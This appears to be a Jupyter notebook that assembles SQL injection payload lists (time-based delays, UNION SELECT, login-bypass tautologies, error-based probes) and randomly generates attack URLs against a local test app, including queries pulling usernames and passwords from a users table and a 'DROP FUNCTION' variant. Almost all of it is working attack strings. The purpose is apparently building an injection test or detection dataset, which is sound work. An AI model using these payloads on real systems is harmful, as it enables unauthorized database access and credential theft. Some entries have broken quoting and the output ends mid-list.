plain text inject

In [58]:
#Time Based SQL Injection
Time_Based =[''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' benchmark(10000000,MD5(1))#''',
''' ' 1 or benchmark(10000000,MD5(1))#''',
''' '(1)r benchmark(10000000,MD5(1))#''',
''' ' or benchmark(10000000,MD5(1))#''',
''' ' 1) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' 1)) or benchmark(10000000,MD5(1))#''',
''' ' )) or benchmark(10000000,MD5(1))#''',
''' ' 1 or pg_sleep(5)-- ''',
''' ' (1)r pg_sleep(5)-- ''',
''' ' or pg_sleep(5)-- ''',
''' ' 1) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' 1)) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#''',
''' ' SLEEP(5)#''',
''' ' SLEEP(5)-- ''',
''' ' SLEEP(5)=" ''',
''' ' (1)r SLEEP(5)''',
''' ' (1)r SLEEP(5)#''',
''' ' (1)r SLEEP(5)-- ''',
''' ' (1)r SLEEP(5)="''',
''' ' waitfor delay '00:00:05' ''',
''' ' waitfor delay '00:00:05'-- ''',
''' ' waitfor delay '00:00:05'#''',
''' ' benchmark(50000000,MD5(1))''',
''' ' benchmark(50000000,MD5(1))-- ''',
''' ' benchmark(50000000,MD5(1))#''']

In [47]:
#Union Select
union_based = [ 
     " ' ORDER BY SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5),3#",
     " ' ORDER BY 1,SLEEP(5),3,4#",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5#''',
     " ' ORDER BY SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5),3-- ",
     " ' ORDER BY 1,SLEEP(5),3,4-- ",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ''',
     " ' UNION ALL SELECT 1",
     " ' UNION ALL SELECT 1,2",
     " ' UNION ALL SELECT 1,2,3",
     " ' UNION ALL SELECT 1#",
     " ' UNION ALL SELECT 1,2#",
     " ' UNION ALL SELECT 1,2,3#",
     " ' UNION ALL SELECT 1,2,3,4#",
     " ' UNION ALL SELECT 1-- ",
     " ' UNION ALL SELECT 1,2-- ",
     " ' UNION ALL SELECT 1,2,3-- ",
     " ' UNION ALL SELECT 1,2,3,4-- ",
     " ' UNION SELECT @@VERSION,SLEEP(5),3",
     " ' UNION SELECT @@VERSION,SLEEP(5),USER(),4",
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6#''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL -- ''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL,NULL -- '''
     ]

In [60]:
Bypass = [
    ''' ' or true -- ''",
    " ' or true -- ",
    " ' or true -- ",
    " ) or true -- ",
    " ') or true -- ",
    " ' or 'x'='x",
    " ') or ('x')=('x",
    " ') or (('x'))=(('x",
    ''' ' or "x"="x ''',
    ''' ') or ("x")=("x ''',
    ''' ')) or (("x"))=(("x ''',
    " ' or 1=1",
    " ' or 1=1-- ",
    " ' or 1=1#",
    " ' or 1=1/*",
    " ' -- ",
    "' #",
    "'/*",
    "' or '1'='1",
    "' or '1'='1'-- ",
    "' or '1'='1'#",
    "' or '1'='1'/*",
    "'or 1=1 or ''='",
    "' or 1=1",
    "' or 1=1-- ",
    "' or 1=1#",
    "' or 1=1/*",
    "') or ('1'='1",
    "') or ('1'='1'-- ",
    "') or ('1'='1'#",
    "') or ('1'='1'/*",
    "') or '1'='1",
    "') or '1'='1'-- ",
    "') or '1'='1'#",
    "') or '1'='1'/*",
    ''' 1234 ' AND 1=0 UNION ALL SELECT 'admin", '81dc9bdb52d04dc20036dbd8313ed055 ''',
    ''' \" -- " ''',
    ''' \" #''',
    ''' \"/*''',
    ''' \' Or \"1\"=\"1 ''',
    ''' \' Or \"1\"=\"1\"-- ''',
    ''' \' Or \"1\"=\"1\"# ''',
    ''' \' Or \"1\"=\"1\"/* ''',
    ''' \"or 1=1 or \"\"=\" ''',
    ''' \' Or 1=1''',
    ''' \' Or 1=1-- ''',
    ''' \' Or 1=1#''',
    ''' \' Or 1=1/*''',
    ''' \") or (\"1\"=\"1''',
    ''' \") or (\"1\"=\"1\"-- ''',
    ''' \") or (\"1\"=\"1\"#''',
    ''' \") or (\"1\ '''
    ]

Gen-test-case!

In [24]:
import random

In [62]:
# errorbase -->
# Time_Based[]
# Bypass[]
table_name = ["employee","customer","service","users"]
user = ['lnwza007','eiei123']

In band
1.error-based
2.union

In [63]:
errorbase=[
"OR 1=1#",
"OR 1=0#",
"OR x=x#",
"OR x=y#",
"OR 1=1-- ",
"OR 1=0-- ",
"OR x=x-- ",
"OR x=y-- ",
"OR 3409=3409 AND ('pytW' LIKE 'pytW",
"OR 3409=3409 AND ('pytW' LIKE 'pytY",
"HAVING 1=1",
"HAVING 1=0",
"HAVING 1=1#",
"HAVING 1=0#",
"HAVING 1=1-- ",
"HAVING 1=0-- ",
"AND 1=1",
"AND 1=0",
"AND 1=1-- ",
"AND 1=0-- ",
"AND 1=1#",
"AND 1=0#",
"AND 1=1 AND '%'='",
"AND 1=0 AND '%'='",
"AND 1083=1083 AND (1427=1427",
"AND 7506=9091 AND (5913=5913",
"AND 1083=1083 AND ('1427=1427",
"AND 7506=9091 AND ('5913=5913",
"AND 7300=7300 AND 'pKlZ'='pKlZ",
"AND 7300=7300 AND 'pKlZ'='pKlY",
"AND 7300=7300 AND ('pKlZ'='pKlZ",
"AND 7300=7300 AND ('pKlZ'='pKlY",
"AS INJECTX WHERE 1=1 AND 1=1",
"AS INJECTX WHERE 1=1 AND 1=0",
"AS INJECTX WHERE 1=1 AND 1=1#",
"AS INJECTX WHERE 1=1 AND 1=0#",
"AS INJECTX WHERE 1=1 AND 1=1-- ",
"AS INJECTX WHERE 1=1 AND 1=0-- ",
"WHERE 1=1 AND 1=1",
"WHERE 1=1 AND 1=0",
"WHERE 1=1 AND 1=1#",
"WHERE 1=1 AND 1=0#",
"WHERE 1=1 AND 1=1-- ",
"WHERE 1=1 AND 1=0-- ",
"ORDER BY 1-- ",
"ORDER BY 2-- ",
"ORDER BY 3-- ",
"ORDER BY 4-- ",
"ORDER BY 5-- ",
"ORDER BY 6-- ",
"ORDER BY 7-- ",
"ORDER BY 8-- ",
"ORDER BY 9-- ",
"ORDER BY 10-- ",
"ORDER BY 11-- ",
"ORDER BY 12-- ",
"ORDER BY 13-- ",
"ORDER BY 14-- ",
"ORDER BY 15-- ",
"ORDER BY 16-- ",
"ORDER BY 17-- ",
"ORDER BY 18-- ",
"ORDER BY 19-- ",
"ORDER BY 20-- ",
"ORDER BY 21-- ",
"ORDER BY 22-- ",
"ORDER BY 23-- ",
"ORDER BY 24",
"ORDER BY 25",
"ORDER BY 26",
"ORDER BY 27",
"ORDER BY 28",
"ORDER BY 29",
"ORDER BY 30",
"ORDER BY 31337",
"RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"%' AND 8310=8310 AND '%'='",
"%' AND 8310=8311 AND '%'='",
"and (select substring(@@version,1,1))='X'",
"and (select substring(@@version,1,1))='M'",
"and (select substring(@@version,2,1))='i'",
"and (select substring(@@version,2,1))='y'",
"and (select substring(@@version,3,1))='c'",
"and (select substring(@@version,3,1))='S'",
"and (select substring(@@version,3,1))='X'"]

In [64]:
def random_data(list_data):
    BP_gen=[]
    for i in range(30) :
        BP_gen.append(user[random.randint(0, len(user)-1)]+" ' "  +
        list_data[random.randint(0, len(list_data)-1)] )
    return BP_gen

In [65]:
random_data(errorbase)

["eiei123 ' %' AND 8310=8310 AND '%'='",
 "lnwza007 ' AND 1=1#",
 "eiei123 ' ORDER BY 4-- ",
 "eiei123 ' AND 7300=7300 AND 'pKlZ'='pKlZ",
 "eiei123 ' HAVING 1=0#",
 "lnwza007 ' ORDER BY 19-- ",
 "lnwza007 ' ORDER BY 10-- ",
 "eiei123 ' ORDER BY 5-- ",
 "eiei123 ' HAVING 1=1",
 "lnwza007 ' and (select substring(@@version,1,1))='M'"]

URL
(finished)

In [1]:
import random
url= "http://localhost:3000/employee?id="
see_able_col=["employee_id" ,
    "prefixname" ,
    "fname",
    "lname" ,
    "nickname" ,
    "email",
    "tel" ,
    "work_background" ,
    "graduation_certificate" ,
    "address" ,
    "id_card" ,
    "house_registration" ]
unsee_col=["price",
            "name",
            "tel",
            "email",
            "lname",
            "fname",
            "customer_id",
            "username",
            "password"
            ]
see_able_value= [("E001", "Mr.", "bobo1", "two1", "baba1", "E001@gmail.com", '0123456781' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340921", "123 r.xxxxx 54000"), 
       ("E002", "Mr.", "bobo2", "two2", "baba2", "E002@gmail.com", '0123456782' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340922", '123 r.xxxxx 54000'), 
       ("E003", "Mr.", "bobo3", "two3", "baba3", "E003@gmail.com", '0123456783' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340923", '123 r.xxxxx 54000'), 
       ("E004", "Mr.", "bobo4", "two4", "baba4", "E004@gmail.com", '0123456784' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340924", '123 r.xxxxx 54000'), 
       ("E005", "Mr.", "bobo5", "two5", "baba5", "E005@gmail.com", '0123456785' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340925", '123 r.xxxxx 54000')]
unsee_value={"price":["100","200","300","400"],
            "name":["A","B","C","D"],
            "tel":["0123456781", "0123456782"],
            "email":["E001@gmail.com", "E002@gmail.com"],
            "lname":["memo1", "memo2"],
            "fname":["one1", "one2"],
            "customer_id":["C001","C002"],
            "username":["lnwza007","eiei123"],
            "password":["123","123"]}

unsee_table =["users","service","customer"]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"]
            }

In [3]:
unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)]
print(unsee_t)
table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)]
print(table_V)
unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)]

print(unsee_v)

users
password
123

In [68]:
def random_urldata(url,list_data,value):
    gen=[]
    for i in range(30) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data)-1)])
    return gen

In [69]:
random_urldata(url,errorbase,see_able_value)

["http://localhost:3000/employee?id=E002AND 1083=1083 AND ('1427=1427",
 'http://localhost:3000/employee?id=E004ORDER BY 14-- ',
 'http://localhost:3000/employee?id=E001AND 1=1',
 'http://localhost:3000/employee?id=E002AND 1=0-- ',
 'http://localhost:3000/employee?id=E004HAVING 1=0-- ',
 'http://localhost:3000/employee?id=E005OR x=x#',
 'http://localhost:3000/employee?id=E002HAVING 1=0#',
 'http://localhost:3000/employee?id=E004ORDER BY 24',
 'http://localhost:3000/employee?id=E004ORDER BY 8-- ',
 'http://localhost:3000/employee?id=E001ORDER BY 27',
 'http://localhost:3000/employee?id=E003HAVING 1=0#',
 'http://localhost:3000/employee?id=E003AS INJECTX WHERE 1=1 AND 1=1',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 "http://localhost:3000/employee?id=E003AND 7300=7300 AND ('pKlZ'='pKlY",
 'http://localhost:3000/employee?id=E001ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E005ORDER BY 21-- ',
 'http://localhost:3000/employee?id=E002AS INJECTX WHERE 1=1 AND 1=1#',
 'http://localhost:3000/employee?id=E004HAVING 1=1#',
 "http://localhost:3000/employee?id=E001OR 3409=3409 AND ('pytW' LIKE 'pytW",
 'http://localhost:3000/employee?id=E005ORDER BY 7-- ',
 'http://localhost:3000/employee?id=E003ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 25',
 'http://localhost:3000/employee?id=E002ORDER BY 19-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 18-- ',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 27',
 'http://localhost:3000/employee?id=E002HAVING 1=1',
 'http://localhost:3000/employee?id=E003AND 1=0',
 "http://localhost:3000/employee?id=E001AND 1=0 AND '%'='",
 'http://localhost:3000/employee?id=E001IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ']

In [48]:
def randomunion_urldata(url,list_data,value):
    gen=[]
    for i in range(10) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data )-1)])
    return gen

In [49]:
randomunion_urldata(url,union_based ,see_able_value)

["http://localhost:3000/employee?id=E004 ' UNION SELECT @@VERSION,SLEEP(5),USER(),4",
 "http://localhost:3000/employee?id=E002 ' UNION ALL SELECT 1,2-- ",
 "http://localhost:3000/employee?id=E003 ' ORDER BY 1,SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1",
 'http://localhost:3000/employee?id=E004 \' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ',
 "http://localhost:3000/employee?id=E005 ' ORDER BY 1,SLEEP(5)#",
 "http://localhost:3000/employee?id=E003 ' UNION SELECT @@VERSION,SLEEP(5),3",
 'http://localhost:3000/employee?id=E002 \' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6',
 "http://localhost:3000/employee?id=E001 ' ORDER BY SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E001 ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#"]

In [4]:
def randomunionWrealdata_urldata(url,value,table_value,unsee_table,unsee_value):
    gen=[]
    for i in range(100) :
        unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)] #select table
        table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)] # colum
        unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)] # value in that column
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])+' " '
        +"UNION SELECT "+ table_V + " " + "FROM " +unsee_t+ "-- ")
    return gen

In [5]:
randomunionWrealdata_urldata(url,see_able_value,table_value,unsee_table,unsee_value)

['http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT email FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E005 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT lname FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT fname FROM customer-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT tel FROM customer-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E003 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT name FROM service-- ',
 'http://localhost:3000/employee?id=E001 " UNION SELECT password FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT customer_id FROM customer-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT price FROM service-- ',
 'http://localhost:3000/employee?id=E004 " UNION SELECT username FROM users-- ',
 'http://localhost:3000/employee?id=E002 " UNION SELECT username FROM users-- ']

In [ ]:
random_urldata(url,Time_Based,see_able_value)

["http://localhost:3000/employee?id=E002 ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E005 ' )) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' ));waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E003 ' 1)) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ",
 "http://localhost:3000/employee?id=E005 ' (1)r SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E005 ' ) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E003 ' ;waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- "]

In [1]:
import string
import random

showList = ["DATABASES", "TABLES", "COLUME"]

last = ["#", "# ", "-- "]
table =["users","service","customer", "employee"]
operator = [" OR ", " AND ", ""]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"],
              "employee":["employee_id", "prefixname", "fname", "lname", "nickname", "email", "tel", "work_background", "graduation_certificate", "address", "id_card", "house_registration"]
            }

type_of_value = {"username":"str",
"fname":"str",
"lname":"str",
"name":"str",
"prefixname":"str",
"nickname":"str",
"password":"both",
"customer_id":"both",
"email":"both",
"employee_id":"both",
"work_background":"both",
"graduation_certificate":"both",
"address":"both",
"house_registration":"both",
"tel":"tel",
"price":"price",
"id_card":"id_card"}


customer_value = [{"username":"Emma","password":"u8N6tK9g"},{"username1":"Noah","password1":"p7H5jM6z"},
{"username":"Olivia","password":"h9L8kQ2t"},{"username1":"Liam","password1":"z5T8gP9u"},
{"username":"Ava","password":"b8K6tH7m"},{"username1":"Mason","password1":"y2Q9uH5t"},
{"username":"Sophia","password":"m6J8hK7z"},{"username1":"Jacob","password1":"w8T6pH9g"},
{"username":"Isabella","password":"x5P9uN8t"},{"username1":"William","password1":"g8K7tZ9h"},
{"username":"Mia","password":"t8J6pH7u"},{"username1":"Ethan","password1":"y9L8kQ5t"},
{"username":"Charlotte","password":"m7H9jK8z"},{"username1":"James","password1":"w6T7pH5g"},
{"username":"Amelia","password":"x8P6uN7t"},{"username1":"Alexander","password1":"g7K9tZ8h"},
{"username":"Abigail","password":"t6J8pH9u"},{"username1":"Michael","password1":"y5L7kQ8t"},
{"username":"Emily","password":"m8H6jK9z"},{"username1":"Benjamin","password1":"w7T9pH6g"},
{"username":"Elizabeth","password":"x6P8uN5t"},{"username1":"Matthew","password1":"g9K7tZ7h"},
{"username":"Avery","password":"t8J9pH6u"},{"username1":"Daniel","password1":"y7L8kQ9t"},
{"username":"Sofia","password":"m6H7jK8z"},{"username1":"Joseph","password1":"w5T6pH7g"},
{"username":"Evelyn","password":"x9P7uN8t"},{"username1":"Samuel","password1":"g7K8tZ9h"},
{"username":"Aubrey","password":"t7J6pH8u"},{"username1":"Christopher","password1":"y8L9kQ7t"},
{"username":"Harper","password":"m9H7jK6z"},{"username1":"Nathan","password1":"w6T8pH5g"},
{"username":"Aria","password":"x7P9uN7t"},{"username1":"Ryan","password1":"g8K7tZ9h"},
{"username":"Adalynn","password":"t6J8pH9u"},{"username1":"Andrew","password1":"y5L7kQ8t"},
{"username":"Ellie","password":"m8H6jK9z"},{"username1":"Oliver","password1":"w7T9pH6g"},
{"username":"Scarlett","password":"x6P8uN5t"},{"username1":"Henry","password1":"g9K7tZ7h"},
{"username":"Aaliyah","password":"t8J9pH6u"},{"username1":"Jaxon","password1":"y7L8kQ9t"}]


def generate_random_string_both() -> str:
    length = random.randint(4, 15)
    letters = string.ascii_letters + string.digits
    rand = ''.join(random.choice(letters) for i in range(length))
    final = '"' + rand + '"'
    return final

def generate_random_string_str() -> str:
    length = random.randint(4, 15)
    letters = string.ascii_letters
    rand = ''.join(random.choice(letters) for i in range(length))
    final = '"' + rand + '"'
    return final

def generate_random_string_tel() -> str:
    return "0" + str(random.randint(100000000, 999999999))

def generate_random_string_id_card() -> str:
    return "1" + str(random.randint(500000000000, 999999999999))

def generate_random_string_price() -> str:
    letters = string.digits
    return ''.join(random.choice(letters) for i in range(3))

In [2]:
def randomSelectForSearch(table, table_value, last):
    gen=[]
    for i in range(100) :
        preStr =""
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        preStr += r'\"; SELECT '
        
        numOfParam=random.randint(0, len(table_value[random_table])-1)
        if (numOfParam == 0):
            preStr += "*" + " FROM " + random_table + "" + random_last
        else:
            for j in range(numOfParam) :
                while True:
                    random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                    if random_table_value not in preStr:
                        typeOfValue.append(type_of_value[random_table_value])
                        break
                    continue 
                    
                preStr += random_table_value
                if j != numOfParam-1 :
                    preStr += ", "
            preStr += " FROM " + random_table
            preStr += "" + random_last
        
        if preStr in gen:
            continue
        else:
            gen.append(preStr)
    return gen

In [3]:
randomSelectForSearch(table, table_value, last)

['\\"; SELECT * FROM users#',
 '\\"; SELECT lname FROM customer# ',
 '\\"; SELECT work_background, lname, prefixname, tel, email, fname, graduation_certificate, house_registration FROM employee-- ',
 '\\"; SELECT email, lname, address, graduation_certificate, house_registration, fname, tel, prefixname, nickname FROM employee#',
 '\\"; SELECT * FROM users# ',
 '\\"; SELECT username FROM users# ',
 '\\"; SELECT price FROM service#',
 '\\"; SELECT username FROM users-- ',
 '\\"; SELECT * FROM users-- ',
 '\\"; SELECT * FROM service# ',
 '\\"; SELECT email FROM customer# ',
 '\\"; SELECT id_card FROM employee# ',
 '\\"; SELECT * FROM service#',
 '\\"; SELECT price FROM service# ',
 '\\"; SELECT name FROM service# ',
 '\\"; SELECT password FROM users-- ',
 '\\"; SELECT * FROM service-- ',
 '\\"; SELECT employee_id, fname FROM employee#',
 '\\"; SELECT * FROM employee-- ',
 '\\"; SELECT price FROM service-- ',
 '\\"; SELECT name FROM service#',
 '\\"; SELECT * FROM customer#',
